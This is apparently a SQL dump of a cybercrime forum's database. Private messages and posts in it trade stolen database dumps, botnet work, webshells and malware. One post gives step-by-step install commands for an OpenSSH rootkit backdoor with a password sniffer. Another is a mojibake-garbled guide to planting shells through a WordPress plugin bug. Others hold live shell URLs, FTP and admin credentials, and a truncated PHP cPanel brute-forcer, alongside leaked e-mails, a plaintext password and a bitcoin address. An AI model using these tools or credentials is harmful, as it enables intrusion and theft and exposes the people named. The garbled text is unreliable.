(54, 173, 'tdss', 'Re: C++', '[QUOTE=syslink]C++ formgraber + webinjects you can give more details on the partnership?[/QUOTE]\r\n\r\nRemember there were 2 customers for your malware? The one who did NOT request cryptolocker/loader is the one who is looking for a partner. You know my jabber, catch me before Sunday or early Sunday because I\'ll have next to no internet after that.', 'a:1:{s:2:\"cc\";a:1:{i:13;s:7:\"syslink\";}}', 0, 1453510233, 1, 1, 0),
(55, 100, 'w0rm', 'jabber', '[email]scene@w0rm.ws[/email]:507d4dca68a34', 'a:1:{s:2:\"cc\";a:1:{i:383;s:5:\"scene\";}}', 0, 1453917309, 0, 1, 0),
(56, 383, 'scene', 'list', 'hey bro\r\ni am in db bussiness.\r\nwhat u got ?', 'a:1:{s:2:\"cc\";a:1:{i:343;s:9:\"king_alex\";}}', 0, 1454458259, 0, 1, 0),
(57, 383, 'scene', 'Re: jabber', 'Thanks sir.\r\nany news from our projects ?', 'a:1:{s:2:\"cc\";a:1:{i:100;s:4:\"w0rm\";}}', 0, 1454458457, 0, 1, 0),
(58, 383, 'scene', 'BOT Project.', 'Hello bro.\r\ni have someone in coding.\r\nhe doing private coding for us , a Botnet in ASM and C++.\r\nit have already Form Grabber and some moudles.\r\nif u want , i can ask him if he intersted to work.', 'a:1:{s:2:\"cc\";a:1:{i:173;s:4:\"tdss\";}}', 0, 1454524039, 0, 1, 0),
(59, 383, 'scene', 'BruteForce', 'i have person want to sell Gharreh.com\r\nwe can make some $ from spaming it.\r\n\r\ni check and found the shell is here\r\n[CODE]http://www.gharreh.com/themes/SDH-Gharreh/js/css.php[/CODE]\r\n\r\ncan u check it ? so we dont need to pay for it.\r\nwe can have it in hand , and i try to make some $ from it.', 'a:1:{s:2:\"cc\";a:1:{i:100;s:4:\"w0rm\";}}', 0, 1454524468, 0, 1, 0),
(60, 13, 'syslink', 'botnet', 'hi add my jabber [email]link3d@w0rm.ws[/email]', 'a:1:{s:2:\"cc\";a:1:{i:284;s:6:\"H0BB1T\";}}', 0, 1454535659, 0, 1, 0),
(61, 173, 'tdss', 'Re: BOT Project.', '[QUOTE=scene]Hello bro.\r\ni have someone in coding.\r\nhe doing private coding for us , a Botnet in ASM and C++.\r\nit have already Form Grabber and some moudles.\r\nif u want , i can ask him if he intersted to work.[/QUOTE]\r\nAdd me on jabber: [email]ciphernetic@w0rm.ws[/email]. ill reply om friday', 'a:1:{s:2:\"cc\";a:1:{i:383;s:5:\"scene\";}}', 0, 1454541997, 1, 1, 0),
(62, 383, 'scene', 'sAv', 'brother , sAv is arrested cause of TalkTalk hack.\r\nplease be aware,close his account.\r\ni know sav from siph0n.\r\nand admin of siph0n was a freind with sav in real life.\r\nhe alreted me that sav is arrested.\r\nignore him and when everything go fine , we re-active him again.', 'a:1:{s:2:\"cc\";a:1:{i:100;s:4:\"w0rm\";}}', 0, 1454556588, 0, 1, 0),
(63, 100, 'w0rm', 'Re: sAv', '[QUOTE=scene]brother , sAv is arrested cause of TalkTalk hack.\r\nplease be aware,close his account.\r\ni know sav from siph0n.\r\nand admin of siph0n was a freind with sav in real life.\r\nhe alreted me that sav is arrested.\r\nignore him and when everything go fine , we re-active him again.[/QUOTE]\r\nBanned. Tnx', 'a:1:{s:2:\"cc\";a:1:{i:383;s:5:\"scene\";}}', 0, 1454572893, 1, 1, 0),
(64, 100, 'w0rm', 'Re: sAv', '[QUOTE=scene]brother , sAv is arrested cause of TalkTalk hack.\r\nplease be aware,close his account.\r\ni know sav from siph0n.\r\nand admin of siph0n was a freind with sav in real life.\r\nhe alreted me that sav is arrested.\r\nignore him and when everything go fine , we re-active him again.[/QUOTE]\r\n\r\nHi, what about topface?', 'a:1:{s:2:\"cc\";a:1:{i:383;s:5:\"scene\";}}', 0, 1454650465, 1, 1, 0),
(65, 383, 'scene', 'TopFace', 'hello \r\ni have talked with someone , he still didnt come online ( it show idle ) \r\nhe is very good buyer.\r\n\r\nbtw never sold him Date dumps , always hacking/cracking/mobile/games forums.\r\n\r\nhe intersted in Dev-Point , insidepro.com forum dumps and ...', 'a:1:{s:2:\"cc\";a:1:{i:100;s:4:\"w0rm\";}}', 0, 1454684909, 0, 1, 0),
(66, 173, 'tdss', 'Re: BOT Project.', '[QUOTE=scene]Hello bro.\r\ni have someone in coding.\r\nhe doing private coding for us , a Botnet in ASM and C++.\r\nit have already Form Grabber and some moudles.\r\nif u want , i can ask him if he intersted to work.[/QUOTE]\r\n\r\nwait, is that syslink you\'re referring to?', 'a:1:{s:2:\"cc\";a:1:{i:383;s:5:\"scene\";}}', 0, 1454737245, 1, 1, 0),
(67, 383, 'scene', 'Re: BOT Project.', 'Hello\r\nno , dont work via syslink.\r\ni not trust him , he try to scam me 1 time.\r\n\r\nmy freind is in siph0n and exploit.im', 'a:1:{s:2:\"cc\";a:1:{i:173;s:4:\"tdss\";}}', 0, 1454764183, 1, 1, 0),
(68, 383, 'scene', 'TopFace', 'Hello sir.\r\nwhatsup ?\r\nabout TopFace , when u dumped it ?\r\ncause my buyer have already dump of TopFace and sprashivai.ru from July.\r\n\r\nu shared with anybody in July ? or sell it already ?', 'a:1:{s:2:\"cc\";a:1:{i:100;s:4:\"w0rm\";}}', 0, 1454764840, 0, 1, 0),
(69, 173, 'tdss', 'Re: BOT Project.', '[QUOTE=scene]Hello\r\nno , dont work via syslink.\r\ni not trust him , he try to scam me 1 time.\r\n\r\nmy freind is in siph0n and exploit.im[/QUOTE]\r\n\r\nSiph0n jabber or the forum? Can he get me an invite and vouch? And just let me know his jabber', 'a:1:{s:2:\"cc\";a:1:{i:383;s:5:\"scene\";}}', 0, 1455210968, 1, 1, 0),
(70, 304, 'Kosmas', 'Money Back Please woRm please!', 'W0rm I\'m begging u please send back my $350USD over bitcoin. I\'m only a student and need to pay bills. please have mercy and do not scam me out of my money.\r\n\r\nPlease send money back $350USD via BTC to 1CrQMT9yESJEyN8fWzx3tYWNjmQLfGj4o.\r\n\r\nI\'m begging you, please.\r\n\r\n-Kosmas\r\n[email]crzyfingers@gmail.com[/email]', 'a:1:{s:2:\"cc\";a:1:{i:100;s:4:\"w0rm\";}}', 0, 1455856705, 0, 1, 0),
(71, 100, 'w0rm', 'Re: TopFace', '[QUOTE=scene]Hello sir.\r\nwhatsup ?\r\nabout TopFace , when u dumped it ?\r\ncause my buyer have already dump of TopFace and sprashivai.ru from July.\r\n[url]https://w0rm.ws/showthread.php?p=3002#post3002[/url]\r\n\r\nu shared with anybody in July ? or sell it already ?[/QUOTE]', 'a:1:{s:2:\"cc\";a:1:{i:383;s:5:\"scene\";}}', 0, 1456051533, 1, 1, 0),
(72, 100, 'w0rm', 'Re: TopFace', '[QUOTE=scene]Hello sir.\r\nwhatsup ?\r\nabout TopFace , when u dumped it ?\r\ncause my buyer have already dump of TopFace and sprashivai.ru from July.\r\n\r\n\r\n\r\nu shared with anybody in July ? or sell it already ?[/QUOTE]\r\n\r\n[url]https://drive.google.com/file/d/0B0ox2xf_0TMjM0loUF9EUkNzM00/view?usp=docslist_api[/url]', 'a:1:{s:2:\"cc\";a:1:{i:383;s:5:\"scene\";}}', 0, 1456197840, 1, 1, 0),
(73, 178, 'dark001', 'Coru.ws', 'Hi Baltazar\r\n\r\nI am interested in your dumps from Coru.ws I saw the screenshot but can you provide another screenshot of some dumps from the forum for me to see it will be great.\r\n\r\nThanks', 'a:1:{s:2:\"cc\";a:1:{i:305;s:8:\"baltazar\";}}', 0, 1456906869, 0, 1, 0),
(74, 383, 'scene', 'bussiness', 'hello\r\ncan we talk in jabber ?\r\ni have some bussiness plan.\r\ni think i can do them with u.\r\n\r\ngive me ur jabber sir.', 'a:1:{s:2:\"cc\";a:1:{i:173;s:4:\"tdss\";}}', 0, 1457137461, 0, 1, 0),
(75, 173, 'tdss', 'Re: bussiness', '[QUOTE=scene]hello\r\ncan we talk in jabber ?\r\ni have some bussiness plan.\r\ni think i can do them with u.\r\n\r\ngive me ur jabber sir.[/QUOTE]\r\n\r\nciphernetic[@]w0rm[.]ws', 'a:1:{s:2:\"cc\";a:1:{i:383;s:5:\"scene\";}}', 0, 1457203950, 1, 1, 0),
(76, 173, 'tdss', 'Re: bussiness', '[QUOTE=scene]hello\r\ncan we talk in jabber ?\r\ni have some bussiness plan.\r\ni think i can do them with u.\r\n\r\ngive me ur jabber sir.[/QUOTE]\r\n\r\nAm I still getting the return on the money I\'ve sent you, please?', 'a:1:{s:2:\"cc\";a:1:{i:383;s:5:\"scene\";}}', 0, 1457823162, 1, 1, 0),
(77, 173, 'tdss', 'Re: bussiness', 'nevermind, I need to pay more attention, syslink edited the jabber post, and said he was you. he scammed me out of money...', 'a:1:{s:2:\"cc\";a:1:{i:383;s:5:\"scene\";}}', 0, 1457884094, 1, 1, 0),
(78, 173, 'tdss', 'Re: bussiness', 'nevermind, I need to pay more attention, syslink edited the jabber post, and said he was you. he scammed me out of money...', 'a:1:{s:2:\"cc\";a:1:{i:383;s:5:\"scene\";}}', 0, 1457884095, 1, 1, 0),
(79, 173, 'tdss', 'Re: bussiness', '[QUOTE=scene]hello\r\ncan we talk in jabber ?\r\ni have some bussiness plan.\r\ni think i can do them with u.\r\n\r\ngive me ur jabber sir.[/QUOTE]\r\n\r\nsorry for the previous PM. I should start reading FULL posts, and who edited them last.....now I lost my college debt payment money.', 'a:1:{s:2:\"cc\";a:1:{i:383;s:5:\"scene\";}}', 0, 1457884192, 1, 1, 0),
(80, 173, 'tdss', 'Re: bussiness', '[QUOTE=scene]hello\r\ncan we talk in jabber ?\r\ni have some bussiness plan.\r\ni think i can do them with u.\r\n\r\ngive me ur jabber sir.[/QUOTE]\r\nsorry again about that, I should really read posts in their ENTIRETY, NOT JUST part of theem. I should also check back for post\'s updates.', 'a:1:{s:2:\"cc\";a:1:{i:383;s:5:\"scene\";}}', 0, 1457885812, 1, 1, 0),
(81, 304, 'Kosmas', 'icloud bypass', 'W0rm I\'m begging u please send back my $350USD over bitcoin. I\'m only a student and need to pay bills. please have mercy and do not scam me out of my money.\r\n\r\nPlease send money back $350USD via BTC to 1CrQMT9yESJEyN8fWzx3tYWNjmQLfGj4o.\r\n\r\nI\'m begging you, please. Then i will resend full $2500.', 'a:1:{s:2:\"cc\";a:1:{i:1;s:5:\"admin\";}}', 0, 1458023248, 0, 1, 0),
(82, 383, 'scene', 'Hello', 'Hello\r\nwhat happen ?\r\ni didnt see msgs , cause i stop working with w0rm.\r\nso i didnt come online.\r\nwhat happen ?\r\ni dont ask any money from anyone.\r\nall w0rm peoples doing scam.\r\nbe aware.\r\n\r\nadmin / other are doing scam.\r\n\r\nlet we talk in jabber.', 'a:1:{s:2:\"cc\";a:1:{i:173;s:4:\"tdss\";}}', 0, 1458769167, 0, 1, 0),
(83, 383, 'scene', 'jabber', 'its your jabber ?\r\nciphernetic[@]w0rm[.]ws \r\n\r\nplease make new one , no more w0rm.ws\r\nits not good service.', 'a:1:{s:2:\"cc\";a:1:{i:173;s:4:\"tdss\";}}', 0, 1458769205, 0, 1, 0),
(84, 173, 'tdss', 'Re: jabber', '[QUOTE=scene]its your jabber ?\r\nciphernetic[@]w0rm[.]ws \r\n\r\nplease make new one , no more w0rm.ws\r\nits not good service.[/QUOTE]\r\n\r\n[email]ciphernetic@monopoly.ms[/email]', 'a:1:{s:2:\"cc\";a:1:{i:383;s:5:\"scene\";}}', 0, 1458769287, 1, 1, 0),
(85, 386, 'Spynet', 'hello', 'hello , give me your contact tnx', 'a:1:{s:2:\"cc\";a:1:{i:135;s:10:\"reversing4\";}}', 0, 1459840469, 1, 1, 0),
(86, 1, 'admin', 'jabber', 'hi\r\n\r\ni create jabber address for you. \r\n\r\n[email]ke7hb@w0rm.ws[/email]\r\npass: 7UkcQ@I2mX\r\n\r\nadd me - [email]admin@w0rm.ws[/email]', 'a:1:{s:2:\"cc\";a:1:{i:387;s:5:\"ke7hb\";}}', 0, 1464173435, 0, 1, 0),
(87, 173, 'tdss', 'former mod', 'scene left the mod field long before i went back to college, and whenever i go to check for things to mod, everything is taken care of by those times. why exactly did i lose my position as super-mod?', 'a:1:{s:2:\"cc\";a:1:{i:387;s:5:\"ke7hb\";}}', 0, 1464477538, 0, 1, 0),
(88, 173, 'tdss', 'former mod , 2', 'considering that ive done a large part in moderation duty in the past, id at least request access to trusted section, because super-mod vet surely qualifies under elite and contribution?', 'a:1:{s:2:\"cc\";a:1:{i:387;s:5:\"ke7hb\";}}', 0, 1464478002, 0, 1, 0),
(89, 173, 'tdss', 'Re: BOT Project.', 'my mod rank was removed from me under the \"new management\"...didn\'t you get my jabber address to add, when I\'ve sent you it, months ago?', 'a:1:{s:2:\"cc\";a:1:{i:383;s:5:\"scene\";}}', 0, 1464538387, 1, 1, 0),
(90, 196, 'apimaster', '10k+ webshell for traffic and spamming', '10k+ webshell for traffic and spamming\r\n\r\ntell me your budget?\r\n\r\nmy jabber: [email]bogaches@dlab.im[/email]', 'a:1:{s:2:\"cc\";a:1:{i:172;s:17:\"hunter_exploitkit\";}}', 14, 1464709204, 0, 1, 0),
(91, 166, 'gilgil', 'x', 'I would like to share govrat 1.0 source code, but all download links there are accessible even by gests. wtf', 'a:1:{s:2:\"cc\";a:1:{i:1;s:5:\"admin\";}}', 0, 1465066025, 0, 1, 0);
DROP TABLE IF EXISTS `pmthrottle`;
CREATE TABLE `pmthrottle` (
`userid` int(10) unsigned NOT NULL,
`dateline` int(10) unsigned NOT NULL,
KEY `userid` (`userid`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
DROP TABLE IF EXISTS `podcast`;
CREATE TABLE `podcast` (
`forumid` int(10) unsigned NOT NULL DEFAULT '0',
`author` varchar(255) NOT NULL DEFAULT '',
`category` varchar(255) NOT NULL DEFAULT '',
`image` varchar(255) NOT NULL DEFAULT '',
`explicit` smallint(6) NOT NULL DEFAULT '0',
`enabled` smallint(6) NOT NULL DEFAULT '1',
`keywords` varchar(255) NOT NULL DEFAULT '',
`owneremail` varchar(255) NOT NULL DEFAULT '',
`ownername` varchar(255) NOT NULL DEFAULT '',
`subtitle` varchar(255) NOT NULL DEFAULT '',
`summary` mediumtext,
`categoryid` smallint(6) NOT NULL DEFAULT '0',
PRIMARY KEY (`forumid`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
DROP TABLE IF EXISTS `podcastitem`;
CREATE TABLE `podcastitem` (
`postid` int(10) unsigned NOT NULL DEFAULT '0',
`url` varchar(255) NOT NULL DEFAULT '',
`length` int(10) unsigned NOT NULL DEFAULT '0',
`explicit` smallint(5) unsigned NOT NULL DEFAULT '0',
`keywords` varchar(255) NOT NULL DEFAULT '',
`subtitle` varchar(255) NOT NULL DEFAULT '',
`author` varchar(255) NOT NULL DEFAULT '',
PRIMARY KEY (`postid`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
DROP TABLE IF EXISTS `poll`;
CREATE TABLE `poll` (
`pollid` int(10) unsigned NOT NULL AUTO_INCREMENT,
`question` varchar(100) NOT NULL DEFAULT '',
`dateline` int(10) unsigned NOT NULL DEFAULT '0',
`options` text,
`votes` text,
`active` smallint(6) NOT NULL DEFAULT '1',
`numberoptions` smallint(5) unsigned NOT NULL DEFAULT '0',
`timeout` smallint(5) unsigned NOT NULL DEFAULT '0',
`multiple` smallint(5) unsigned NOT NULL DEFAULT '0',
`voters` smallint(5) unsigned NOT NULL DEFAULT '0',
`public` smallint(6) NOT NULL DEFAULT '0',
`lastvote` int(10) unsigned NOT NULL DEFAULT '0',
PRIMARY KEY (`pollid`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
DROP TABLE IF EXISTS `pollvote`;
CREATE TABLE `pollvote` (
`pollvoteid` int(10) unsigned NOT NULL AUTO_INCREMENT,
`pollid` int(10) unsigned NOT NULL DEFAULT '0',
`userid` int(10) unsigned DEFAULT NULL,
`votedate` int(10) unsigned NOT NULL DEFAULT '0',
`voteoption` int(10) unsigned NOT NULL DEFAULT '0',
`votetype` int(10) unsigned NOT NULL DEFAULT '0',
PRIMARY KEY (`pollvoteid`),
UNIQUE KEY `pollid` (`pollid`,`userid`,`votetype`),
KEY `userid` (`userid`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
DROP TABLE IF EXISTS `post`;
CREATE TABLE `post` (
`postid` int(10) unsigned NOT NULL AUTO_INCREMENT,
`threadid` int(10) unsigned NOT NULL DEFAULT '0',
`parentid` int(10) unsigned NOT NULL DEFAULT '0',
`username` varchar(100) NOT NULL DEFAULT '',
`userid` int(10) unsigned NOT NULL DEFAULT '0',
`title` varchar(250) NOT NULL DEFAULT '',
`dateline` int(10) unsigned NOT NULL DEFAULT '0',
`pagetext` mediumtext,
`allowsmilie` smallint(6) NOT NULL DEFAULT '0',
`showsignature` smallint(6) NOT NULL DEFAULT '0',
`ipaddress` char(15) NOT NULL DEFAULT '',
`iconid` smallint(5) unsigned NOT NULL DEFAULT '0',
`visible` smallint(6) NOT NULL DEFAULT '0',
`attach` smallint(5) unsigned NOT NULL DEFAULT '0',
`infraction` smallint(5) unsigned NOT NULL DEFAULT '0',
`reportthreadid` int(10) unsigned NOT NULL DEFAULT '0',
PRIMARY KEY (`postid`),
KEY `userid` (`userid`),
KEY `threadid` (`threadid`,`userid`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1;
INSERT INTO `post` (`postid`, `threadid`, `parentid`, `username`, `userid`, `title`, `dateline`, `pagetext`, `allowsmilie`, `showsignature`, `ipaddress`, `iconid`, `visible`, `attach`, `infraction`, `reportthreadid`) VALUES
(1030, 1027, 0, 'w0rm', 1, 'Qiwi', 1403408416, 'äтÿ Ѡþñþûþчúðüø QIWI/цõýтр þñýþòûõýøѠQIWI.\r\n[url]ftp://automat:CkyaHjozpZw@79.142.17.90:21/[/url]\r\n\r\nðòтþр:kx00', 1, 0, '141.101.92.74', 0, 1, 0, 0, 0),
(1029, 1026, 0, 'w0rm', 1, 'milw0rm', 1403406958, 'Skript of milw0rm\r\n\r\n[URL=\"https://www.dropbox.com/s/58xdbqn7t15n6do/b0x.tar.gz\"]download[/URL]', 1, 0, '141.101.92.74', 0, 1, 0, 0, 0),
(1028, 1025, 0, 'w0rm', 1, 'gazavat', 1403406679, 'gazavat admin panel \n\n//[URL=\"https://www.dropbox.com/s/uxqbtdeulwjubq5/gaz.tar.gz\"]download[/URL]\n\nEDIT: Thanks to apimaster, download link [URL=\"https://cloud.mail.ru/public/8rvi/aYz1sebdr\"]updated-here[/URL] . Use this instead of the one above, as that one is dead, currently.\n\n~tdss', 1, 0, '141.101.92.74', 0, 1, 0, 0, 0),
(9, 9, 0, 'w0rm', 1, 'New invite', 1401030928, '[b]Name[/b]: CaFc_404\r\n [b]Age[/b]: 17\r\n [b]ICQ[/b]: 7\r\n [b]e-mail[/b]: cafc.404@gmail.om\r\n [b]Info[/b]: I Want To Learn . .', 1, 0, '108.162.225.94', 0, 1, 0, 0, 0),
(10, 10, 0, 'Invite', 2, 'New invite', 1401064661, '[b]Name[/b]: Xtr3me\r\n [b]Age[/b]: 30\r\n [b]ICQ[/b]: 608131031\r\n [b]e-mail[/b]: whizzhak@msn.com\r\n [b]Info[/b]: .', 1, 0, '108.162.222.84', 0, 1, 0, 0, 0),
(12, 12, 0, 'Invite', 2, 'New invite', 1401078804, '[b]Name[/b]: Pablo Fernández Cuadros\r\n [b]Age[/b]: 34\r\n [b]ICQ[/b]: icq\r\n [b]e-mail[/b]: pablo.fernandez.cuadros@gmail.com\r\n [b]Info[/b]: .', 1, 0, '173.245.49.101', 0, 1, 0, 0, 0),
(13, 13, 0, 'Invite', 2, 'New invite', 1401093533, '[b]Name[/b]: Filipe Polido AKA YaBa\r\n [b]Age[/b]: 32\r\n [b]ICQ[/b]: icq\r\n [b]e-mail[/b]: polido@gmail.com\r\n [b]Info[/b]: Portuguese geek, self-teached in most of IT areas.\r\nWorking as sysadmin by day.\r\nReversing software and doing pentests at night.\r\nMS certified tech, although having Linux in my heart :)\r\nWill provide more details if asked.\r\n.', 1, 0, '108.162.219.126', 0, 1, 0, 0, 0),
(1019, 1015, 1017, 'w0rm', 1, '', 1403316161, '- antichat \r\n- asechka\r\n- blackseoschool\r\n- cih.ms\r\n- damagelab\r\n- darklife\r\n- dehak.ru\r\n- exploit.in\r\n- hackzone\r\n- kode.cc\r\n- rdot\r\n- maza\r\n- korovka.cc\r\n- milw0rm\r\n\r\n[URL=\"https://www.dropbox.com/s/d6y388k6e9eum1h/%D0%9C%D0%B0%D0%BA.zip\"]download[/URL]', 1, 0, '141.101.92.74', 0, 1, 0, 0, 0),
(1020, 1017, 0, 'w0rm', 1, 'Cve-2014-0322', 1403322294, 'about:[url]http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0322[/url]\r\n[URL=\"https://www.dropbox.com/s/hqnmats2vhd8xc2/CVE-2014-0322.tar.gz\"]download[/URL]', 1, 0, '141.101.92.74', 0, 1, 0, 0, 0),
(1021, 1018, 0, 'sniffer', 0, 'OpenSSH rootkit backdoor tool with ssh sniffer', 1403334206, '[url]http://1337day.com/exploits/22098[/url]\n\n\nwget file\n\ntar -xzvf rk.tgz\ncd rk\n./inst\n\nIt will ask you\n\n[+] Current openssh version: 5.1p1 Debian-5\n[+] SSH Daemon location: /usr/sbin/sshd\n[+] Would ye like to continue ? [y/n]:\n\ntype y\n\nthen wil ask you the password for backdoor and can type any password you want\n\nThe compiling process will start afte you type the password . Then after the compiling must to type this\n\n\nrm -rf /etc/ssh/sshd_config\nrm -rf /etc/ssh/ssh_config\nmv sshd_config /etc/ssh/\nmv ssh_config /etc/ssh/\n\n\nthen ps -aux |grep sshd\n\ncopy the pid of /usr/sbin/sshd procces\nkill -9 PID\nthen start again sshd\ntype /usr/sbin/sshd\n\nNow you can login with Putty on port 22 with you password\n\nYou cand find the sniffer log file here\n\n/usr/include/log.h\n\nDownlaod : [url]http://up.persianscript.ir/uploads/204f-rk.zip[/url]', 1, 1, '108.162.254.61', 1, 1, 0, 0, 0),
(1034, 1031, 0, 'w0rm', 1, 'OpenSC.ws', 1403408894, 'OpenSC 2012\nfree\n[url]https://mega.co.nz/#!Eg1RgQqR!E4iPcHOZ5lyx0nJCUAvVGl2ZGUVU-g8psJW1qgDGpc8[/url]', 1, 0, '141.101.92.74', 0, 1, 0, 0, 0),
(2936, 2346, 2919, 'w0rm', 100, '', 1449041270, '[quote=mo-dem;2919]ne sovsem ponyal, a chto imenno prodaetsya? Dostup, ili bd?[/quote]\r\nДампы баз данных.', 1, 0, '141.101.80.23', 0, 1, 0, 0, 0),
(1033, 1030, 0, 'w0rm', 1, 'FuckAV.ru [private]', 1403408824, 'fuckav full db (2014)\n200 usd \n[email]w0rm@cih.ms[/email]', 1, 0, '141.101.92.74', 0, 1, 0, 0, 0),
(1054, 1048, 0, 'w0rm', 1, 'ýõüýþóþ ñðóþфøч WordPress', 1403411422, 'ßþóþòþрøûø тут Ѡþôýøü чõûþòõúþü. Þúð÷ыòðõõцþ ÿþô Òß õÑÂть тру ñðóø ÿþô ðòтþüðтøчõÑÂúøù ðÿûþðô шõûûþò.\r\n\r\náÿþÑÂþñ ýþüõр 1.\r\n\r\n×ðõ÷öõýýыù timthumb\r\n\r\næøтðтð:\r\n(15:43:42) xxx: timthomb ûьõт üøýøшõûûы чõрõ÷ ôþüõý blogger.com\r\n\r\n(15:44:22) 288088: ôðöõ øýтõрõÑÂýþ\r\n(15:44:28) 288088: рðÑÂÑÂúðöõшь ÿþôрþñýþÑÂтø?\r\n(15:44:53) xxx: Ѡрõóðю чтþ тþ ýðÿþôþñøø russian-blogger.come.ru.tf, úøôðю ò úþрõýь üøýøшõûû, gif ø zip, ø þý ûьёт.\r\n\r\n(15:46:18) xxx: ýу, òþт ÑÂðüþ þÿøÑÂðýøõ ðòтþрð, ÷ðúþÿøÿðÑÂтю\r\n\r\n(15:46:36) xxx: [timthumb]\r\nçõрõ÷ timthumb üþöýþ ÷ðûøть üøýø-шõûû, òыÿþûýÑÂющøù ÿõрõôðòðõüыù õüу úþô ò eval.\r\nãöõ чõрõ÷ тðúøõ üøýø-шõûûы üþöýþ ÷ðûøòðть ôðûьшõ WSO, ýðÿрøüõр.\r\n×ðûøть ýð хþÑÂÑ‚ ÑÂúрøÿты ø÷ data\\upload\\timthumb\\ (шõûû ûþöøть ò s.zip).\r\nßрõôòðрøтõûьýþ ýуöýþ õóþ ýõüýþóþ уýøúðûø÷øрþòðть:\r\nØôõü ò data\\upload\\timthumb\\s.zip ø òøôøü тðü ÷ðúþôøрþòðýýыù ò base64 üøýø-шõûû. à ðÑÂúþôøруõü õóþ, òøôøü úðúþù-ûøñþ ÿðрðüõтр (ask øûø ÿþхþöøù).\r\n×ðüõýÑÂõü ýð ÑÂòþù, ýðÿрøüõр ask42. Úþôøруõü þñрðтýþ ò base64 ø ÷ðüõýÑÂõü ÑÂтðрыù úþô ýþòыü ò s.zip.\r\nÃÂтþт öõ ÿðрðüõтр ýþòыù (ask42 - ÿрøüõр) ýуöýþ ÿрþÿøÑÂðть ò ýðÑÂтрþùúðх ò рð÷ôõûõ [exp], ò eval_param.\r\n\r\n(15:46:47) xxx: URL Ѡ÷ðûøтыüø ÑÂúрøÿтðüø ôþûöõý ñыть ôþÑÂтуÿõý ÿþ ðôрõÑÂу, ÑÂþôõрöðщøü ò ÑÂõñõ \"blogger.com\". \r\nâ.õ. чтþ-тþ òрþôõ тþóþ: [url]http://tt1234blogger.compress.to/s.php[/url] (фрøôþüõý þт changeip.com ÿþôþùôõт - compress.to)\r\n\r\nßþÑÂûõ òÑÂõх ýðÑÂтрþõú ôûѠtimthumb, üþöýþ ÿþтõÑÂтøть ýð 1 ÑÂòþõü ÑÂðùтõ, òÑÂõ ûø рðñþтðõт. Ãâ€ÃȄʄÂтþóþ ýуöýþ:\r\n\r\n1. ÿþÑÂтðòøть ýð ûþúðûхþÑÂÑ‚ øûø хþÑÂтøýó òþрôÿрõÑÂÑÂ\r\n2. ÿþÑÂтðòøть úðúую-ýøñуôь тõüу øûø ÿûðóøý, ò úþтþрþü üþöõт ñыть уÑÂ÷òøüыù фðùû timthumb.\r\náÿøÑÂþú ÿûðóøýþò\\тõü ûõöøт ò data/timthumb.txt\r\nñõрõшь þттуôð ýð÷òðýøõ ÿûðóøýð, ýðÿрøüõр òþт þттуôð ÑÂтрþчúð:\r\n$wp-content$/themes/13floor/timthumb.php\r\n\r\n÷ýðчøт ò тõüõ 13floor ÑÂúрøÿт ñуôõт øÑÂúðть ÑÂтþт фðùû ÿþ ðôрõÑÂу ÑÂтþüу.\r\n\r\n3. ÷ýðчøт ÑÂтðòøшь тõüу 13floor, ðúтøòøруõшь.\r\n4. ø тðú úðú ты ÿþÑÂтðòøû тõüу ÑÂòõöую, тþ ò ýõù уöõ ÑÂтþт ñðó øÑÂÿрðòûõý, ÿþÑÂтþüу ôûѠтõÑÂтð тõñõ ýуöýþ ÷ðúøýуть ÿþ ðôрõÑÂу 13floor/timthumb.php тþчýþ уÑÂ÷òøüыù фðùû timthumb.php. ÃÂтþ ÿûðóøý òõрÑÂøø ôþ 1.33 òрþôõ.\r\nÒþт ýðÿрøüõр 1.32 òõрÑÂøÑÂ:\r\n\r\n(15:47:00) xxx: [url]http://code.google.com/p/timthumb/so...c=svn132&r=132[/url]\r\n\r\nÃÂðÑÂтрðøòðõшь ýð ÿрþñøò þôýþóþ ÑÂðùтð тõÑÂтþòþóþ ÑÂúðýõр, ÿрþñуõшь.\r\nÜþöõшь ÿрõôòðрøтõûьýþ ÿþчøтðть ýð ðчðтõ øûø óôõ уóþôýþ õщõ ÿрþ timthumb, ø руúðüø ÷ðûøть (тðü 1 øûø 2 ÷ðÿрþÑÂð òÑÂõóþ).\r\n\r\n\r\n\r\n(15:47:24) xxx: òþт úðú тþ тðú ÑÂтþ ø рðñþтðõт))\r\nÑðóð ýþüõр 2\r\n\r\nà õчь ÿþùôёт þñ ckeditor-for-wordpress\r\n\r\náðüð ñðóð - [url]http://car-insurance-facts.com/wp-co...itor.config.js[/url]\r\n\r\nèõûû ûþöøтÑÂѠò úþрõýь ÑÂðùтð.\r\n\r\nÜþù ÿõрõ÷ðûøтыù шõûû - ÿðÑÂÑ 111\r\n\r\n_http://car-insurance-facts.com/wp-content/uu.php \r\n\r\nðôüøýúð - /wp-login.php:admin:123123', 1, 0, '141.101.92.74', 0, 1, 0, 0, 0),
(1058, 1052, 0, 'w0rm', 1, 'Брут сPanel', 1403411805, '[code]make_username(); \r\n $sitelist = explode(\"\\n\",$this->openfile($this->sitelist)); \r\n $passlist = explode(\"\\n\",$this->openfile($this->passlist)); \r\n $increment = 0; \r\n \r\n echo \"\\n\\n[*]Site list -> $this->sitelist\\n\"; \r\n echo \"[*]Pass list -> $this->passlist\\n\"; \r\n echo \"[*]Total urls -> \".count($sitelist).\"\\n\"; \r\n echo \"[*]Total pass -> \".count($passlist).\"\\n\"; \r\n echo \"[*]Cracking started\\n\\n\"; \r\n \r\n foreach($sitelist as $id => $site) \r\n { \r\n $increment++; \r\n $site = trim($site); \r\n echo \"-------------------------------------------------------\\n\"; \r\n echo \"[*]Trying site: \".$site.\" $increment / \".count($sitelist).\"\\n\"; \r\n if(eregi(\'http\',$site)){ \r\n $site = str_replace(\"http://\",\"https://\",$site); \r\n }else{ \r\n $site = \"https://$site\"; \r\n } \r\n $site= $site.\":2083\"; \r\n \r\n if(!$this->pass_site($site)) \r\n { \r\n echo \"[-]Not cpanel,passing site\\n\"; \r\n echo \"-------------------------------------------------------\\n\\n\"; \r\n continue; \r\n } \r\n\r\n echo \"[*]Connected Cpanel [OK]\\n\"; \r\n echo \"[*]Username: \".$usernames[$id].\"\\n\"; \r\n echo \"[*]Loaded \".count($passlist).\" passwords\\n\"; \r\n echo \"[*]Coded by Miyachung ||| 